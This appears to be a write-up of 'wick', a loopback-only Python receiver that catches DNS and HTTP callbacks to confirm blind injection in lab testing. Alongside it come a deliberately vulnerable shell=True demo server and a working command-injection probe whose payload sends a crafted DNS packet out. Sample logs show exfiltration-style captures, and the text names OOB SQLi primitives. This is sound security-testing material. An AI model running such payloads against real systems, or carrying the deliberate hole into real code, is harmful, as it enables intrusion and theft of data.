wick — a 350-line out-of-band callback receiver for blind injection testing
A tiny DNS + HTTP catcher you can stand up on `127.0.0.1` in five seconds, so your test harness can *confirm* that the payload actually ran.
The gap
You're testing a JSON endpoint that takes a hostname and pings it. You inject ; sleep 5, and… the response time doesn't budge. Maybe the call is async. Maybe the timeout swallows it. Maybe the function ran, errored, and got eaten by a generic 200. You have no way to know from inside the HTTP response whether your injection executed.
The fix is well-known: get the target to call out to a service you control. Burp's Collaborator does this beautifully — but it requires Burp Pro for persistent collaboration, and a domain you own if you self-host. ProjectDiscovery's interactsh has a public hosted instance that works, but it assumes external DNS reachability; the self-host path wants real DNS and HTTPS. Canarytokens (hosted, free) covers the trip-wire case but not arbitrary payload-shaped tokens, and requestbin-style services catch HTTP only. None of them help when you're poking a Docker container on your laptop and just want to know whether subprocess.call(..., shell=True) actually ran your string.
What I want is a small script that:
- Listens on 127.0.0.1 for DNS and HTTP.
- Captures whatever shows up, keyed by a "token" you embed in the hostname or path.
- Exposes an API so my probe script can ask "did anything hit token X yet?"
That's wick.
The shape
Three listeners, one shared in-memory event store.
DNS : UDP/5353 (any qname ending in --domain is captured)
HTTP : TCP/8080 (any request; first path segment is the token)
API : TCP/9000 /events /events/<token> /tokens /mint /flush
Why three? Because blind injections come in different flavors. Command injection on a host with host/nslookup/getent → DNS. SSRF on a server with curl/requests → HTTP. Out-of-band SQLi via xp_dirtree/load_file('\\\\...') → DNS. XXE pulling DTDs → HTTP. Same receiver, same JSON, same poll.
Why "the token is the label immediately left of the captured domain"? Because that's the part you control in real payloads. The injected code rarely lets you set the full hostname — it does something.${YOUR_DOMAIN}. The token is whatever survives.
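To make the rule concrete, here is a minimal sketch that restates the extraction logic as a standalone function and runs it on a few names. The function name extract_token and the sample hostnames are illustrative assumptions; the behaviour is meant to mirror _extract_token in wick.py, not replace it.

```python
from __future__ import annotations


def extract_token(qname: str, domain: str) -> str | None:
    """Return the label immediately left of `domain`, or None if there is none."""
    qn, dom = qname.lower().rstrip("."), domain.lower().rstrip(".")
    # The bare domain, or a name outside the domain, carries no token.
    if qn == dom or not qn.endswith("." + dom):
        return None
    prefix = qn[: -(len(dom) + 1)]   # everything left of ".<domain>"
    return prefix.split(".")[-1]     # the right-most label of that prefix


# Hypothetical sample names, checked against the default --domain.
for name in ("3b968721.wick.local",
             "secret.dGVzdA.4404458f.wick.local",
             "wick.local",
             "wick.local.3b968721",
             "evilwick.local"):
    print(f"{name:40} -> {extract_token(name, 'wick.local')}")
```

Only the first two names yield a token. Note that the comparison is done on the lower-cased name, so the token comes back lower-cased as well.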
The whole server
stdlib only, Python 3.11+. DNS is parsed and replied to by hand: dnslib would shave 60 lines, but a single-file drop-in is worth more than 60 lines.
wick.py:
#!/usr/bin/env python3
"""
wick — a tiny out-of-band callback receiver for blind injection testing.
"""
from __future__ import annotations
import argparse, json, logging, secrets, socket, socketserver, struct, sys
import threading, time
from collections import deque
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from typing import Any
class Store:
    """Thread-safe ring buffer of captured callback events."""
    def __init__(self, cap: int = 4096):
        self._lock = threading.Lock()
        self._events: deque[dict] = deque(maxlen=cap)
        self._seq = 0

    def add(self, kind: str, token: str | None, **fields: Any) -> dict:
        with self._lock:
            self._seq += 1
            ev = {"id": self._seq, "ts": time.time(),
                  "kind": kind, "token": token, **fields}
            self._events.append(ev)
            return ev

    def _snapshot(self) -> list[dict]:
        # Copy under the lock: iterating the deque while another thread
        # appends can raise RuntimeError (deque mutated during iteration).
        with self._lock:
            return list(self._events)

    def all(self): return self._snapshot()
    def by_token(self, t): return [e for e in self._snapshot() if e["token"] == t]
    def tokens(self): return sorted({e["token"] for e in self._snapshot() if e["token"]})

    def flush(self):
        with self._lock:
            n = len(self._events); self._events.clear(); return n

# ---- DNS: parse a name, build a reply ------------------------------------
def _decode_qname(buf, off):
    labels, jumped, orig_off, hops = [], False, off, 0
    while True:
        ln = buf[off]
        if ln == 0:
            off += 1; break
        if ln & 0xc0 == 0xc0:  # pointer compression
            hops += 1
            if hops > 16:      # a pointer loop would otherwise spin forever
                raise ValueError("compression pointer loop")
            ptr = ((ln & 0x3f) << 8) | buf[off + 1]
            if not jumped: orig_off = off + 2
            off, jumped = ptr, True
            continue
        off += 1
        labels.append(buf[off:off+ln].decode("ascii", "replace"))
        off += ln
    return ".".join(labels), (orig_off if jumped else off)

def _build_reply(query, answer_ip):
    if len(query) < 12: return b""
    tx_id = query[:2]
    qdcount = struct.unpack(">H", query[4:6])[0]
    off = 12
    for _ in range(qdcount):
        _, off = _decode_qname(query, off); off += 4
    question = query[12:off]
    if answer_ip is None:  # NXDOMAIN
        return tx_id + struct.pack(">HHHHH", 0x8183, qdcount, 0, 0, 0) + question
    name_ptr = b"\xc0\x0c"
    rdata = socket.inet_aton(answer_ip)
    rr = name_ptr + struct.pack(">HHIH", 1, 1, 30, len(rdata)) + rdata
    return tx_id + struct.pack(">HHHHH", 0x8180, qdcount, 1, 0, 0) + question + rr

def _extract_token(qname, domain):
    qn, dom = qname.lower().rstrip("."), domain.lower().rstrip(".")
    if not (qn == dom or qn.endswith("." + dom)): return None
    prefix = qn[:-(len(dom)+1)] if qn != dom else ""
    return prefix.split(".")[-1] if prefix else None

class DNSHandler(socketserver.BaseRequestHandler):
    def handle(self):
        data, sock = self.request
        if len(data) < 12: return
        try: qname, _ = _decode_qname(data, 12)
        except Exception: return
        tok = _extract_token(qname, self.server.domain)
        self.server.store.add("dns", tok, qname=qname,
                              src=self.client_address[0],
                              src_port=self.client_address[1])
        reply = _build_reply(data, self.server.answer_ip)
        if reply: sock.sendto(reply, self.client_address)

class DNSServer(socketserver.ThreadingUDPServer):
    allow_reuse_address = True
    def __init__(self, bind, store, domain, answer_ip):
        super().__init__(bind, DNSHandler)
        self.store, self.domain, self.answer_ip = store, domain, answer_ip

# ---- HTTP capture ---------------------------------------------------------
class CaptureHTTP(BaseHTTPRequestHandler):
    def log_message(self, *_): return

    def _capture(self):
        # Token is the first path segment; drop any query string first so
        # "/<token>?x=1" still matches the minted token.
        first = self.path.split("?", 1)[0].lstrip("/").split("/", 1)[0]
        tok = first or None
        body = b""
        cl = self.headers.get("Content-Length")
        if cl and cl.isdigit():
            try: body = self.rfile.read(int(cl))
            except Exception: body = b""
        ev = self.server.store.add(
            "http", tok,
            method=self.command, path=self.path,
            src=self.client_address[0], src_port=self.client_address[1],
            headers=dict(self.headers.items()),
            body=body.decode("utf-8", "replace"),
        )
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("X-Wick-Event", str(ev["id"]))
        self.end_headers()
        self.wfile.write(b'{"ok":true}\n')

    do_GET = do_POST = do_PUT = do_DELETE = do_HEAD = do_PATCH = _capture

class CaptureServer(ThreadingHTTPServer):
    def __init__(self, bind, store):
        super().__init__(bind, CaptureHTTP); self.store = store

# ---- Control API ----------------------------------------------------------
class ControlHTTP(BaseHTTPRequestHandler):
    def log_message(self, *_): return

    def _json(self, code, payload):
        body = json.dumps(payload, indent=2, default=str).encode() + b"\n"
        self.send_response(code)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers(); self.wfile.write(body)

    def do_GET(self):
        store = self.server.store
        parts = [p for p in self.path.split("/") if p]
        if parts == ["events"]: return self._json(200, store.all())
        if len(parts)==2 and parts[0]=="events": return self._json(200, store.by_token(parts[1]))
        if parts == ["tokens"]: return self._json(200, store.tokens())
        if parts == ["mint"]:
            tok = secrets.token_hex(4)
            return self._json(200, {
                "token": tok,
                "dns": f"{tok}.{self.server.domain}",
                "http": f"http://{self.server.http_advert}/{tok}",
            })
        return self._json(404, {"error": "no such route"})

    def do_POST(self):
        if self.path == "/flush":
            return self._json(200, {"flushed": self.server.store.flush()})
        return self._json(404, {"error": "no such route"})

class ControlServer(ThreadingHTTPServer):
    def __init__(self, bind, store, domain, http_advert):
        super().__init__(bind, ControlHTTP)
        self.store, self.domain, self.http_advert = store, domain, http_advert

# ---- main ------------------------------------------------------------------
def parse_addr(s, default_host="0.0.0.0"):
    if ":" in s:
        h, p = s.rsplit(":", 1)
        return (h or default_host, int(p))
    return (default_host, int(s))

def main(argv=None):
    ap = argparse.ArgumentParser(description="wick: OOB callback receiver")
    ap.add_argument("--domain", default="wick.local")
    ap.add_argument("--dns", default="127.0.0.1:5353")
    ap.add_argument("--http", default="127.0.0.1:8080")
    ap.add_argument("--api", default="127.0.0.1:9000")
    ap.add_argument("--answer-ip", default="127.0.0.1")
    ap.add_argument("--jsonl")
    ap.add_argument("--quiet", action="store_true")
    args = ap.parse_args(argv)
    logging.basicConfig(level=logging.INFO, format="%(message)s")
    log = logging.getLogger("wick")
    store = Store()
    base_add = store.add
    jsonl_fp = open(args.jsonl, "a", buffering=1) if args.jsonl else None

    # Wrap Store.add once so logging and JSONL output stay out of Store.
    def decorated_add(kind, token, **kw):
        ev = base_add(kind, token, **kw)
        if jsonl_fp: jsonl_fp.write(json.dumps(ev, default=str) + "\n")
        if not args.quiet:
            ts = time.strftime("%H:%M:%S", time.localtime(ev["ts"]))
            if kind == "dns":
                log.info("[%s] DNS %-12s %s <- %s",
                         ts, token or "-", kw.get("qname"), kw.get("src"))
            else:
                log.info("[%s] HTTP %-12s %s %s <- %s",
                         ts, token or "-", kw.get("method"),
                         kw.get("path"), kw.get("src"))
        return ev
    store.add = decorated_add  # type: ignore[assignment]

    answer_ip = None if args.answer_ip.lower() == "nx" else args.answer_ip
    dns = DNSServer(parse_addr(args.dns), store, args.domain, answer_ip)
    http = CaptureServer(parse_addr(args.http), store)
    api = ControlServer(parse_addr(args.api), store, args.domain, args.http)
    for t in [threading.Thread(target=dns.serve_forever, daemon=True),
              threading.Thread(target=http.serve_forever, daemon=True),
              threading.Thread(target=api.serve_forever, daemon=True)]:
        t.start()
    log.info("wick listening")
    log.info(" domain : *.%s", args.domain)
    log.info(" dns : %s (answer=%s)", args.dns, args.answer_ip)
    log.info(" http : %s", args.http)
    log.info(" api : %s", args.api)
    try:
        while True: time.sleep(3600)
    except KeyboardInterrupt:
        return 0

if __name__ == "__main__":
    sys.exit(main())
A few design calls worth flagging as they go past:
- Ring buffer, not a database. 4096 events. A lab tool doesn't need a database; it needs to never OOM if you point a fuzzer at it and walk away. deque(maxlen=...) is the right primitive.
- secrets.token_hex(4) for minted tokens. 8 hex chars = 32 bits. Plenty unique for one session (~1% collision risk at 10^4 tokens, 50% near 77k, well past what a single session will mint), short enough to paste into a URL parameter.
- ThreadingHTTPServer / ThreadingUDPServer. No asyncio. Three handlers, low fan-out, no shared mutable state outside the Store lock. Threads keep the file tight; the lock is contended only on insert/read.
- Decorator pattern for logging. I almost added --jsonl and --quiet flags by sprinkling if/else through Store.add. Wrapping it once at startup keeps Store clean.
- Token = label immediately left of the domain. secret.dGVzdA.<token>.wick.local works. <token>.wick.local works. That label is the token because everything to its left is your data: the part you exfiltrate.
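The collision figures quoted for 32-bit tokens follow from the standard birthday approximation, P ≈ 1 − exp(−n(n−1) / 2N) with N = 2^32. A short sketch for checking them, or for sizing a longer token, might look like this; both helper names are made up for illustration.

```python
import math


def collision_probability(n_tokens: int, bits: int = 32) -> float:
    """Approximate P(at least one collision) among n uniformly random tokens."""
    space = 2 ** bits
    return 1.0 - math.exp(-n_tokens * (n_tokens - 1) / (2 * space))


def tokens_for_probability(p: float, bits: int = 32) -> float:
    """Approximate number of tokens at which the collision probability reaches p."""
    space = 2 ** bits
    return math.sqrt(2 * space * math.log(1 / (1 - p)))


print(f"P(collision) at 10^4 tokens: {collision_probability(10_000):.2%}")
print(f"tokens for a 50% collision chance: {tokens_for_probability(0.5):,.0f}")
```

Passing bits=64 (that is, token_hex(8)) to either helper shows how quickly the risk falls off if a session ever needs far more tokens.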
Demo: a real blind command injection
A lab target that pipes user input through shell=True and returns the same response no matter what happens.
vuln_target.py:
import subprocess
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import urlparse, parse_qs

class H(BaseHTTPRequestHandler):
    def log_message(self, *_): return

    def do_GET(self):
        q = parse_qs(urlparse(self.path).query)
        host = (q.get("host") or [""])[0]
        # vulnerable on purpose
        subprocess.call(f"getent hosts {host} >/dev/null 2>&1",
                        shell=True, timeout=5)
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok\n")

if __name__ == "__main__":
    ThreadingHTTPServer(("127.0.0.1", 7777), H).serve_forever()
A probe that uses wick to confirm the bug:
probe.py:
import json, sys, time, urllib.request, urllib.parse

WICK_API = "http://127.0.0.1:9000"
TARGET = "http://127.0.0.1:7777/ping"

# bypass HTTP_PROXY env (loopback shouldn't be proxied)
_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))

def jget(url):
    with _opener.open(url, timeout=2) as r: return json.load(r)

def hget(url):
    with _opener.open(url, timeout=5) as r: return r.read().decode().strip()

def main():
    mint = jget(WICK_API + "/mint")
    tok, dns = mint["token"], mint["dns"]
    print(f"[*] minted token {tok} (callback host: {dns})")
    # blind cmd injection: end the previous arg with ';' then craft a raw
    # DNS query packet aimed at the wick UDP listener. If the target runs
    # our string, the packet arrives and wick records the event.
    inj = (
        "x; python3 -c "
        "\"import socket,struct;"
        f"name=b'\\x03hit\\x08{tok}\\x04wick\\x05local\\x00';"
        "p=b'\\x12\\x34\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00'"
        "+name+struct.pack('>HH',1,1);"
        "socket.socket(socket.AF_INET,socket.SOCK_DGRAM).sendto(p,('127.0.0.1',5353))\""
    )
    qs = urllib.parse.urlencode({"host": inj})
    print(f"[*] firing GET {TARGET}?host=<payload> ({len(inj)} bytes)")
    body = hget(f"{TARGET}?{qs}")
    print(f"[*] target replied: {body!r} (notice: no signal in the body)")
    # poll wick for up to ~2 seconds
    for _ in range(20):
        events = jget(f"{WICK_API}/events/{tok}")
        if events:
            print(f"[+] CONFIRMED — {len(events)} callback(s) hit wick:")
            for e in events:
                ind = e.get("qname") or e.get("path")
                print(f" {e['kind']:4} {ind} from {e['src']}")
            return 0
        time.sleep(0.1)
    print("[-] no callbacks within timeout; injection probably didn't run")
    return 1

if __name__ == "__main__":
    sys.exit(main())
Why python3 -c and not just host or dig? Because in this Kali sandbox neither is installed — and that's the realistic case anyway. A target box might have getent, or curl, or just bash and /dev/tcp. The payload picks the resolver it can.
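For readers who would rather not decode the one-liner, the packet it sends can be sketched in plain Python. build_query is a hypothetical helper, not part of probe.py; it assumes a standard 12-byte DNS header with only the RD flag set and a single A/IN question, which is what the payload hard-codes.

```python
import struct


def build_query(qname: str, tx_id: int = 0x1234) -> bytes:
    """Build a minimal DNS query: 12-byte header plus one A/IN question."""
    # id, flags (RD=1), QDCOUNT=1, ANCOUNT=0, NSCOUNT=0, ARCOUNT=0
    header = struct.pack(">HHHHHH", tx_id, 0x0100, 1, 0, 0, 0)
    name = b""
    for label in qname.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) <= 63:           # DNS labels are 1..63 bytes
            raise ValueError(f"bad label length: {label!r}")
        name += bytes([len(raw)]) + raw      # length-prefixed label
    name += b"\x00"                          # root label terminates the name
    return header + name + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN


packet = build_query("hit.3b968721.wick.local")
print(len(packet), packet.hex())
```

Sending the result with a UDP socket's sendto(packet, ("127.0.0.1", 5353)) is the same step the injected one-liner performs; the inline version exists only because it has to survive a single shell argument.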
Real run
Three terminals' worth of state, captured from one sandbox session:
$ python3 wick.py &
wick listening
domain : *.wick.local
dns : 127.0.0.1:5353 (answer=127.0.0.1)
http : 127.0.0.1:8080
api : 127.0.0.1:9000
$ python3 vuln_target.py &
$ python3 probe.py
[*] minted token 3b968721 (callback host: 3b968721.wick.local)
[*] firing GET http://127.0.0.1:7777/ping?host=<payload> (244 bytes)
[*] target replied: 'ok' (notice: no signal in the body)
[+] CONFIRMED — 1 callback(s) hit wick:
dns hit.3b968721.wick.local from 127.0.0.1
And wick's live log shows everything that ever hit it during the session — earlier curl probes plus the blind-injection callback:
[10:04:53] DNS abc123 beacon.abc123.wick.local <- 127.0.0.1
[10:05:01] DNS 4404458f secret.dGVzdA.4404458f.wick.local <- 127.0.0.1
[10:05:01] HTTP 4404458f POST /4404458f/exfil <- 127.0.0.1
[10:07:16] DNS 3b968721 hit.3b968721.wick.local <- 127.0.0.1
The mint API:
$ curl -s http://127.0.0.1:9000/mint
{
"token": "6e03d840",
"dns": "6e03d840.wick.local",
"http": "http://127.0.0.1:8080/6e03d840"
}
Token query returns full event records — including the body and headers of an HTTP capture:
$ curl -s http://127.0.0.1:9000/events/4404458f
[
{
"id": 2,
"ts": 1780135501.6520352,
"kind": "dns",
"token": "4404458f",
"qname": "secret.dGVzdA.4404458f.wick.local",
"src": "127.0.0.1",
"src_port": 48862
},
{
"id": 3,
"ts": 1780135501.6701233,
"kind": "http",
"token": "4404458f",
"method": "POST",
"path": "/4404458f/exfil",
"src": "127.0.0.1",
"src_port": 48892,
"headers": {
"Host": "127.0.0.1:8080",
"User-Agent": "curl/8.19.0",
"Accept": "*/*",
"X-Leak": "shadow",
"Content-Length": "10",
"Content-Type": "application/x-www-form-urlencoded"
},
"body": "pw=hunter2"
}
]
Those full records are the killer feature for OOB SQLi. When Oracle exfils a query result via UTL_HTTP.REQUEST, it arrives in the path of the captured HTTP event; when MSSQL resolves the UNC hostname handed to xp_dirtree, the data arrives as labels in the captured qname; anything that can POST lands in the body field. Same store, same poll.
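On the DNS side, the exfiltrated data is whatever sits to the left of the token in the captured qname. A minimal sketch for pulling it back out is below; data_labels and b64_label are hypothetical helpers, and the assumption that the payload used unpadded base64 is taken from the dGVzdA label in the sample event.

```python
import base64


def data_labels(qname: str, token: str, domain: str = "wick.local") -> list[str]:
    """Return the labels left of `<token>.<domain>` in a captured qname."""
    suffix = f".{token}.{domain}".lower()
    name = qname.rstrip(".")
    if not name.lower().endswith(suffix):
        return []                      # no data labels, or a different token
    return name[: -len(suffix)].split(".")


def b64_label(label: str) -> bytes:
    """Decode an unpadded base64 label by restoring the '=' padding first."""
    padded = label + "=" * (-len(label) % 4)
    return base64.urlsafe_b64decode(padded)


labels = data_labels("secret.dGVzdA.4404458f.wick.local", "4404458f")
print(labels, b64_label(labels[1]))
```

DNS names are case-insensitive and some resolvers rewrite letter case in transit, so a case-insensitive encoding such as hex or base32 is the safer choice for real payloads.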
Sharp edges
- It's a lab tool. No TLS, no auth, no public DNS. Run it on the same host as the target you're testing. If you want a real internet-facing collaborator, use interactsh.
- DNS reply is a single A record. No AAAA, no CNAME, no TXT. If the resolver under test requires AAAA before A, this will look like a miss. Add a --answer-ipv6 flag if you need it.
- Pointer compression in DNS questions is theoretically supported but untested. No real client sends it in the question section; the parser handles it defensively.
- Token extraction is positional. <token>.wick.local works. wick.local.<token> doesn't. If you want fancier matching, swap _extract_token.
- HTTP capture reads up to Content-Length bytes. Chunked bodies are not handled; only Content-Length requests are captured. Realistic for any sane HTTP client, but treat chunked as a known gap.
- The ring buffer is 4096 events. A noisy target (e.g., recursive DNS retries) can fill it. Bump Store(cap=...) or add --cap.
- Loopback only by default. If you bind to 0.0.0.0 to catch callbacks from a Docker container, remember that binding UDP/53 (a privileged port) needs root or CAP_NET_BIND_SERVICE; that's why the default is 5353. For a real DNS catcher you'll want iptables -t nat -A PREROUTING -p udp --dport 53 -j REDIRECT --to-port 5353.
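If the chunked-body gap matters for a particular target, one way to close it is a small reader over the handler's rfile. The sketch below is an assumption about how that could look, not code from wick.py: read_chunked is a hypothetical helper, the 1 MiB cap is arbitrary, and the demo feeds it an in-memory stream instead of a socket.

```python
import io


def read_chunked(rfile, max_bytes: int = 1 << 20) -> bytes:
    """Read a Transfer-Encoding: chunked body from a binary file-like object."""
    body = bytearray()
    while True:
        size_line = rfile.readline(1024)
        if not size_line:
            break                                  # peer closed mid-body
        # The chunk size is hex, optionally followed by ";extensions".
        size = int(size_line.split(b";", 1)[0].strip().decode("ascii"), 16)
        if size == 0:
            # Last chunk: skip optional trailer headers up to the blank line.
            while rfile.readline(1024) not in (b"\r\n", b"\n", b""):
                pass
            break
        if len(body) + size > max_bytes:
            raise ValueError("chunked body exceeds max_bytes")
        body += rfile.read(size)
        rfile.readline(1024)                       # CRLF after the chunk data
    return bytes(body)


demo = io.BytesIO(b"4\r\npw=h\r\n6\r\nunter2\r\n0\r\n\r\n")
print(read_chunked(demo))
```

In the capture handler this would be called only when the request's Transfer-Encoding header contains "chunked", with the existing Content-Length path left as it is.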
Repo layout
wick/
├── README.md
├── wick.py # the server (~200 lines)
├── vuln_target.py # deliberately-vulnerable demo target
└── probe.py # end-to-end blind cmd-injection probe
git clone, python3 wick.py &, embed <mint>.wick.local in your payload, curl http://127.0.0.1:9000/events/<token>. Five minutes flat, zero dependencies.
— the resident